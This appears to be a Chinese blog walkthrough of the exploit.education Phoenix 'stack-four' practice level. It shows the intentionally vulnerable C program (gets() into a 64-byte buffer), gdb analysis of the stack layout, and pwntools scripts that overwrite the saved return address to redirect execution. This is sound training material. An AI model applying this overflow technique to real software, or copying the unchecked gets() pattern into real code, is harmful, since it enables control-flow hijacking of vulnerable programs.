• phoenix/stack-four

    STACK FOUR

    Stack Four takes a look at what can happen when you can overwrite the saved instruction pointer (standard buffer overflow).

    Hints

    /*
 * phoenix/stack-four, by https://exploit.education
 *
 * The aim is to execute the function complete_level by modifying the
 * saved return address, and pointing it to the complete_level() function.
 *
 * Why were the apple and orange all alone? Because the bananna split.
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER 
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

char *gets(char *);

void complete_level() {
  printf("Congratulations, you've finished " LEVELNAME " :-) Well done!
");
  exit(0);
}

void start_level() {
  char buffer[64];
  void *ret;

  gets(buffer);

  ret = __builtin_return_address(0);
  printf("and will be returning to %p
", ret);
}

int main(int argc, char **argv) {
  printf("%s
", BANNER);
  start_level();
}

    这个题目有点意思,用了 __builtin_return_address(0); 这是 gcc 的内建函数,看起来就像是和返回地址相关的

    查了一下 via:http://blog.chinaunix.net/uid-26817832-id-3351553.html

    __builtin_return_address(0) 的含义是,得到当前函数返回地址

    __builtin_return_address(1) 的含义是,得到当前函数的调用者的返回地址

    gdb 调试看看

    image-20200428163146802

    到调用 start_level 留意下,call 的下一条指令的地址,这就是 start_level 调用完之后要回到这里继续执行,这个地址就是 start_level 的返回地址

    放在 start_level 的栈上 rbp + 8 的位置

    好了,我们直接步入 start_level 看看 ret = __builtin_return_address(0);,ret 是什么东西,是不是返回地址

    image-20200428164044625

    可以看到,确实是把 rbp + 8 上的东西赋值给了 rbp - 8, rbp - 8 就是 ret 变量在栈上的位置

     ► 0x400649 <start_level+20>    mov    rax, qword ptr [rbp + 8]
   0x40064d <start_level+24>    mov    qword ptr [rbp - 8], rax
   0x400651 <start_level+28>    mov    rax, qword ptr [rbp - 8]

    image-20200428164537486

    可以看到,确实是把 start_level 的返回地址赋值给了 ret

    好了,回到正题,实际上我们反编译出来的是这样的

    local_res0 就是返回地址

    image-20200428164640916

    我们看到的 image-20200428164754688

    local_10 其实就是源码里面的 ret 变量,它位于:rbp - 0x10 + 8, :8 是加 8 的意思,其实就是 rbp - 8,这个地方是存的返回地址,然后用 printf("and will be returning to %p ", ret); 打印出来(其实这个不用管)

    我们的目的是调用 complete_level 所以我们只需要把 start_level 返回地址覆盖成 complete_level 的地址就可以

    看一下,漏洞点就在

    gets(local_58);

    image-20200428165602947

    我们可以无限(其实是有限制的,比如终端的限制什么的,但是,上限是一个很大的值,反正就是可以输入很多就是了)写入 local_58

    因为这一次我们要覆盖的地方是函数的返回地址,而不是栈上的变量,返回地址位于 rbp + 8

    好了,现在看一下 local_58 的地址:

    image-20200428174107256

    说实话,在这里的时候我被演了,没仔细看,以为 local_58 位于 rbp - 0x58,我直接填充了0x58 + 0x8,返回地址直接变成 0x4141414141414141,看了 gets(local_58); 的汇编才知道,其实是从 rbp - 0x50 开始写入的。

    所以,要覆盖的地方位于 rbp + 8rbp - 0x50 开始覆盖,记住还有一个 rbp 要填充(8 Bytes),所以就是 0x50 + 0x8,你会发现我怎么不加 rbp + 8 的那个 8 了,其实越过 rbp 以后地址就是往高的地方增长了(我懒得描述了,看图吧)

    填充长度:0x58

    via :https://bbs.pediy.com/thread-200575.htm

    496841_xqjwzb3vp0m4ogz

    拿到 complete_level 的地址 :0x000000000040061d

    image-20200428170121883

    写 payload:

    from pwn import *

complete_level = 0x000000000040061d
exp = "A" * (0x58)
exp += p64(complete_level)

print(exp)

    我就不用 procces 了(我知道 pwntools 有这个东西),原本我还想手动来着,算了

    一样的:

    from pwn import *

p = process("./stack-four")
complete_level = 0x000000000040061d
exp = "A" * (0x58)
exp += p64(complete_level)
p.sendline(exp)
p.interactive()

    image-20200428175512906

    pwn !
  • 相关阅读:
    angularJS中的MVC思想?
    angularJs初体验,实现双向数据绑定!使用体会:比较爽
    原生JS去解析地址栏的链接?超好用的解决办法
    HDCMS多图字段的使用?
    sublime添加到鼠标右键打开文件的方法?
    Ajax做列表无限加载和Ajax做二级下拉选项
    Atitit.获取某个服务 网络邻居列表 解决方案
    Atitit. 注册表操作查询 修改 api与工具总结 java c# php js python 病毒木马的原理
    Atitit. 注册表操作查询 修改 api与工具总结 java c# php js python 病毒木马的原理
    Atitit.prototype-base class-based  基于“类” vs 基于“原型”
  • 原文地址:https://www.cnblogs.com/crybaby/p/12939897.html
Copyright © 2020-2023  润新知